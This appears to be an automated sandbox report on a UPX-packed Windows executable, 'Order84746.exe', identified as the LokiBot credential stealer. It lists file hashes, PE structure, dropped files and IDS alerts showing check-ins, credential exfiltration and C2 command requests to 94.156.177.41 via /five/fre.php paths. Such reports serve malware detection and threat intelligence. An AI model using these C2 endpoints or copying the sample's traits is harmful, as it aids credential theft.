                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: Order84746.exe
Time | Type | Description
01:37:04 | API Interceptor | 32x Sleep call for process: svchost.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
94.156.177.41 | FVR-N2411-07396.exe | malicious | Lokibot, PureLog Stealer | 94.156.177.41/soja/five/fre.php
 | Scan copy.exe | malicious | Lokibot, PureLog Stealer | 94.156.177.41/simple/five/fre.php
 | file.exe | malicious | Lokibot | 94.156.177.41/maxzi/five/fre.php
 | Payment Advice.xls | malicious | HTMLPhisher, Lokibot | 94.156.177.41/simple/five/fre.php
 | stthigns.doc | malicious | Lokibot | 94.156.177.41/maxzi/five/fre.php
 | goodtoseeuthatgreatthingswithentirethingsgreatfor.hta | malicious | Cobalt Strike, Lokibot | 94.156.177.41/maxzi/five/fre.php
 | PO-000041492.docx.doc | malicious | Lokibot | 94.156.177.41/maxzi/five/fre.php
 | ECxDwGGFH3.exe | malicious | Lokibot | 94.156.177.41/simple/five/fre.php
 | greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta | malicious | Cobalt Strike, HTMLPhisher, Lokibot | 94.156.177.41/simple/five/fre.php
 | Payment Advice.xls | malicious | HTMLPhisher, Lokibot | 94.156.177.41/simple/five/fre.php
                        No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
NET1-ASBG | FVR-N2411-07396.exe | malicious | Lokibot, PureLog Stealer | 94.156.177.41
 | Scan copy.exe | malicious | Lokibot, PureLog Stealer | 94.156.177.41
 | la.bot.sparc.elf | malicious | Unknown | 93.123.76.46
 | efN78UF3Si.exe | malicious | DarkTortilla, SmokeLoader | 94.156.177.166
 | file.exe | malicious | Lokibot | 94.156.177.41
 | filepdf.pdf.lnk.download.lnk | malicious | Unknown | 94.156.177.166
 | putty .exe | malicious | DarkTortilla, SmokeLoader | 94.156.177.166
 | 2.ps1 | malicious | Unknown | 94.156.177.166
 | Payment Advice.xls | malicious | HTMLPhisher, Lokibot | 94.156.177.41
 | stthigns.doc | malicious | Lokibot | 94.156.177.41
                        No context
                        No context
                        Process:C:\Users\user\Desktop\Order84746.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):81882
                        Entropy (8bit):7.960253809061817
                        Encrypted:false
                        SSDEEP:1536:N84RYAocnUiqy86Kld/SRUgG9NlX4THYCjXcwSl2w:N8grocn46G0RUbNlX41I
                        MD5:A26C9E7CD8282CE3598085EFE6E3A638
                        SHA1:23EBD2444EBD5758FF146C4BB15E13B2A584F270
                        SHA-256:106D03A3E65BB59261A0ACE79FF7DA102374EBEA83154736A7F17278135B416D
                        SHA-512:1A0FF06FF9523AD8D7B62F8C82AF89EBA33394D00976AEDC45EF10D0539455A3BB93583431FD67F234E6200D67E2B2E9D3883405830D54BA6CCD814C38E36425
                        Malicious:false
                        Reputation:low
                        Preview:EA06.....B..z...B..g.Ng*.H..j..R.C.P@.I..H.....#..@.I.#.I..(......^-.....8...... ....y.N.2.Mh..t.uc..bW...P..iS...&r.Yg7{..z.?........o.u...a.(.........W......^.....{.~..i...:..&s...y~...=..g..>o.P..Zn;O~......./;;F..g.._+.O.].=..P..:-g{\..35...h.).bg5..h.....f..'5I......@.....Q..&3Z.6.0....*...-..B..........y......4..,U.P....*...O..G...Q.0../.;A.L&`.&..B....iW.P..>..".Q.O&sY...A....H8...."/. ._./T...Y.2j."[#3..;.U.....D.d...Fg.O.n^.#...32.L..F..U...D?.P.......Z..w.....*U_.....>......Q.Z.4..........m..N.>.@.!..P{\..:{.."..S...O*8.......m..."}J..@...N.z....._...e..[U".1.L....A..U!.Z.".L.}...&..Y..'sZ.....U..=..Y.U&t....Tej.;...Y..U....Zhp:..I0.J@3.,.s..(t0..H.w..f.W.P.t..ck..J....#..Q.t-..K..I@...F.S..0..,.3......x.D.O.....u-."(..%Z....5....v..:|.]B.C..(.>..cW.s...?.....k.....D.....Uh.@.D..NMnkP.j$5.G...Dn...e.c..DT..su......=<.T.P+..W.{V....JWr.g.....^.}|....-.?.....n...D..4.lf.c.........M?.@<.wN..tj.gc..L.}....r........U...Mj...e.r..+/....3..c
                        Process:C:\Users\user\Desktop\Order84746.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):7.456255383661251
                        Encrypted:false
                        SSDEEP:3072:kXOQ+ieppoWfjE94UAhh/gjijSP90VzVIao:kUiecmw94TcmSPeV+H
                        MD5:9BC6AF9C2EB2F14D11504D025EF3D893
                        SHA1:4B3869C8783256E06A6254AB5EC84FD4B337C437
                        SHA-256:9E76A9F7F77EB205E9818AAC8AEF21484337B7CFBF8F98100D7CD9574DC7968F
                        SHA-512:E290AE6AF8C10D48271BDF2502FD3E2E805DDD32CE5DA89DEC2934607EA395CB261416A54AFF98184E7B029BC9E4A16C067446735BAC4CE49E3FA1153356640D
                        Malicious:false
                        Reputation:low
                        Preview:|..WWCCBEY8T..WH.1PNWTCC.AY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBA.8T3;H.I1.G.u.B..xl<ZFw85^7<69c #/7W .W2h5D>n>:c...yU;WPyEJ;tNWTCCBA..,..^..X...U.......A.......U...@..#.uu....B...W...%.....A...U.B......X.iq..........F..= +..O.T35WHG1P..TC.CEY.\_bWHG1PNWT.CA@R9X35oIG1.FWTCCB.`9T3%WHGaQNWT.CBQY8T15WMG0PNWTCFB@Y8T35WhM1PJWTCCBA[8T.5WXG1@NWTCSBAI8T35WHW1PNWTCCBAY8..4W,G1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35W.F1.NWTCCBAY8T35WHG1PNWTCCBAY8T.A2031PN.bBCBQY8T.4WHC1PNWTCCBAY8T35wHGQ~<357"BA9xT35.IG1.NWT.BBAY8T35WHG1PN.TC.l%8L535Wl.9PN.UCC@AY8*25WHG1PNWTCCBA.8T../HG1PNWTcCBAY2T3.WHG.QNWTCCBAY8T35WHG1.NWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35WHG1PNWTCCBAY8T35
                        Process:C:\Windows\SysWOW64\svchost.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:1
                        Process:C:\Windows\SysWOW64\svchost.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):46
                        Entropy (8bit):1.0424600748477153
                        Encrypted:false
                        SSDEEP:3:/lbq:4
                        MD5:8CB7B7F28464C3FCBAE8A10C46204572
                        SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                        SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                        SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                        Malicious:false
                        Reputation:high, very likely benign file
                        Preview:........................................user.
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                        Entropy (8bit):7.91727517371604
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.39%
                        • UPX compressed Win32 Executable (30571/9) 0.30%
                        • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        File name:Order84746.exe
                        File size:532'480 bytes
                        MD5:6e891f3adbfd415fae70ff8376014769
                        SHA1:9dd2239eba106fe8b3b97992064d07c532a0c9ee
                        SHA256:a2504b173353b434fe409705dbc066fb36c9a74d45a36d89ee421a1da3b4461b
                        SHA512:c125badd57a5acc02bb10091ac1fa4e6881ab9bca4df4f01f7dd61f4ac92795edacac8a0117603d4ec69a684e6752ab25d734c14a149f720314da1c33df35806
                        SSDEEP:12288:EOv5jKhsfoPA+yeVKUCUxP4C902bdRtJJPizdEsy9jgO1d5v5/BsuogV+a:Eq5TfcdHj4fmbGVWgO75B/h+a
                        TLSH:5FB42381A8D4CC62E7A13331C17ACFA106A57D31CDC52F6D57A8F19EB831643A982B7D
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                        Icon Hash:aaf3e3e3938382a0
                        Entrypoint:0x505f50
                        Entrypoint Section:UPX1
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x6749572B [Fri Nov 29 05:54:51 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:ef471c0edf1877cd5a881a6a8bf647b9
                        Instruction
                        pushad
                        mov esi, 004B2000h
                        lea edi, dword ptr [esi-000B1000h]
                        push edi
                        jmp 00007F88BCB1716Dh
                        nop
                        mov al, byte ptr [esi]
                        inc esi
                        mov byte ptr [edi], al
                        inc edi
                        add ebx, ebx
                        jne 00007F88BCB17169h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007F88BCB1714Fh
                        mov eax, 00000001h
                        add ebx, ebx
                        jne 00007F88BCB17169h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc eax, eax
                        add ebx, ebx
                        jnc 00007F88BCB1716Dh
                        jne 00007F88BCB1718Ah
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007F88BCB17181h
                        dec eax
                        add ebx, ebx
                        jne 00007F88BCB17169h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc eax, eax
                        jmp 00007F88BCB17136h
                        add ebx, ebx
                        jne 00007F88BCB17169h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc ecx, ecx
                        jmp 00007F88BCB171B4h
                        xor ecx, ecx
                        sub eax, 03h
                        jc 00007F88BCB17173h
                        shl eax, 08h
                        mov al, byte ptr [esi]
                        inc esi
                        xor eax, FFFFFFFFh
                        je 00007F88BCB171D7h
                        sar eax, 1
                        mov ebp, eax
                        jmp 00007F88BCB1716Dh
                        add ebx, ebx
                        jne 00007F88BCB17169h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007F88BCB1712Eh
                        inc ecx
                        add ebx, ebx
                        jne 00007F88BCB17169h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jc 00007F88BCB17120h
                        add ebx, ebx
                        jne 00007F88BCB17169h
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        adc ecx, ecx
                        add ebx, ebx
                        jnc 00007F88BCB17151h
                        jne 00007F88BCB1716Bh
                        mov ebx, dword ptr [esi]
                        sub esi, FFFFFFFCh
                        adc ebx, ebx
                        jnc 00007F88BCB17146h
                        add ecx, 02h
                        cmp ebp, FFFFFB00h
                        adc ecx, 02h
                        lea edx, dword ptr [edi+ebp]
                        cmp ebp, FFFFFFFCh
                        jbe 00007F88BCB17170h
                        mov al, byte ptr [edx]
                        Programming Language:
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [ASM] VS2012 UPD4 build 61030
                        • [RES] VS2012 UPD4 build 61030
                        • [LNK] VS2012 UPD4 build 61030
                        Name | Virtual Address | Virtual Size | Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1343ec | 0x424 | .rsrc
                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x107000 | 0x2d3ec | .rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x134810 | 0x18 | .rsrc
                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x106134 | 0x48 | UPX1
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                        UPX0 | 0x1000 | 0xb1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        UPX1 | 0xb2000 | 0x55000 | 0x54200 | 1012b37c3e0f9403bfd950a6e58642af | False | 0.9887223718424963 | data | 7.937042659102802 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        .rsrc | 0x107000 | 0x2e000 | 0x2da00 | e33689e4881e3fbb36f7458f6772917f | False | 0.8873394691780822 | data | 7.795435484430241 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                        RT_ICON | 0x1075ac | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                        RT_ICON | 0x1076d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                        RT_ICON | 0x107804 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                        RT_ICON | 0x107930 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
                        RT_ICON | 0x107c1c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
                        RT_ICON | 0x107d48 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
                        RT_ICON | 0x108bf4 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
                        RT_ICON | 0x1094a0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
                        RT_ICON | 0x109a0c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
                        RT_ICON | 0x10bfb8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
                        RT_ICON | 0x10d064 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
                        RT_MENU | 0xca4a0 | 0x50 | data | English | Great Britain | 1.1375
                        RT_STRING | 0xca4f0 | 0x594 | data | English | Great Britain | 1.007703081232493
                        RT_STRING | 0xcaa84 | 0x68a | data | English | Great Britain | 1.0065710872162486
                        RT_STRING | 0xcb110 | 0x490 | data | English | Great Britain | 1.009417808219178
                        RT_STRING | 0xcb5a0 | 0x5fc | data | English | Great Britain | 1.0071801566579635
                        RT_STRING | 0xcbb9c | 0x65c | data | English | Great Britain | 1.0067567567567568
                        RT_STRING | 0xcc1f8 | 0x466 | data | English | Great Britain | 1.0097690941385435
                        RT_STRING | 0xcc660 | 0x158 | data | English | Great Britain | 1.0319767441860466
                        RT_RCDATA | 0x10d4d0 | 0x269c1 | data | | | 1.0003541054095924
                        RT_GROUP_ICON | 0x133e98 | 0x76 | data | English | Great Britain | 0.6610169491525424
                        RT_GROUP_ICON | 0x133f14 | 0x14 | data | English | Great Britain | 1.25
                        RT_GROUP_ICON | 0x133f2c | 0x14 | data | English | Great Britain | 1.15
                        RT_GROUP_ICON | 0x133f44 | 0x14 | data | English | Great Britain | 1.25
                        RT_VERSION | 0x133f5c | 0xdc | data | English | Great Britain | 0.6181818181818182
                        RT_MANIFEST | 0x13403c | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
                        DLL | Import
                        KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                        ADVAPI32.dll | AddAce
                        COMCTL32.dll | ImageList_Remove
                        COMDLG32.dll | GetSaveFileNameW
                        GDI32.dll | LineTo
                        IPHLPAPI.DLL | IcmpSendEcho
                        MPR.dll | WNetUseConnectionW
                        ole32.dll | CoGetObject
                        OLEAUT32.dll | VariantInit
                        PSAPI.DLL | GetProcessMemoryInfo
                        SHELL32.dll | DragFinish
                        USER32.dll | GetDC
                        USERENV.dll | LoadUserProfileW
                        UxTheme.dll | IsThemeActive
                        VERSION.dll | VerQueryValueW
                        WININET.dll | FtpOpenFileW
                        WINMM.dll | timeGetTime
                        WSOCK32.dll | socket
                        Language of compilation system | Country where language is spoken
                        English | Great Britain
                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                        2024-11-29T07:37:00.208189+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49730 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:00.208189+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49730 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:00.208189+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49730 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:01.743805+0100 | 2024312 | ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 | 1 | 192.168.2.4 | 49730 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:02.129463+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49731 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:02.129463+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49731 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:02.129463+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49731 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:03.474759+0100 | 2024312 | ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 | 1 | 192.168.2.4 | 49731 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:03.780451+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49732 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:03.780451+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49732 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:03.780451+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49732 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:05.072766+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49732 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:05.072766+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49732 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:05.193223+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.4 | 49732 | TCP
                        2024-11-29T07:37:05.683692+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49733 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:05.683692+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49733 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:05.683692+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49733 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:07.366794+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49733 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:07.366794+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49733 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:07.486946+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.4 | 49733 | TCP
                        2024-11-29T07:37:07.798758+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49734 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:07.798758+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49734 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:07.798758+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49734 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:10.975348+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49734 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:10.975348+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49734 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:11.095624+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.4 | 49734 | TCP
                        2024-11-29T07:37:11.363666+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49735 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:11.363666+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49735 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:11.363666+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49735 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:12.885873+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49735 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:12.885873+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49735 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:13.005901+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.4 | 49735 | TCP
                        2024-11-29T07:37:13.268211+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49736 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:13.268211+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49736 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:13.268211+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49736 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:14.639768+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49736 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:14.639768+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49736 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:14.759712+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.4 | 49736 | TCP
                        2024-11-29T07:37:15.019342+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49738 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:15.019342+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49738 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:15.019342+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49738 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:16.454677+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49738 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:16.454677+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49738 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:16.574591+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.4 | 49738 | TCP
                        2024-11-29T07:37:16.845716+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49740 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:16.845716+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49740 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:16.845716+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49740 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:21.366370+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49740 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:21.366370+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49740 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:21.486611+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.4 | 49740 | TCP
                        2024-11-29T07:37:21.749992+0100 | 2021641 | ET MALWARE LokiBot User-Agent (Charon/Inferno) | 1 | 192.168.2.4 | 49744 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:21.749992+0100 | 2025381 | ET MALWARE LokiBot Checkin | 1 | 192.168.2.4 | 49744 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:21.749992+0100 | 2825766 | ETPRO MALWARE LokiBot Checkin M2 | 1 | 192.168.2.4 | 49744 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:23.076999+0100 | 2024313 | ET MALWARE LokiBot Request for C2 Commands Detected M1 | 1 | 192.168.2.4 | 49744 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:23.076999+0100 | 2024318 | ET MALWARE LokiBot Request for C2 Commands Detected M2 | 1 | 192.168.2.4 | 49744 | 94.156.177.41 | 80 | TCP
                        2024-11-29T07:37:23.197276+0100 | 2025483 | ET MALWARE LokiBot Fake 404 Response | 1 | 94.156.177.41 | 80 | 192.168.2.4 | 49744 | TCP
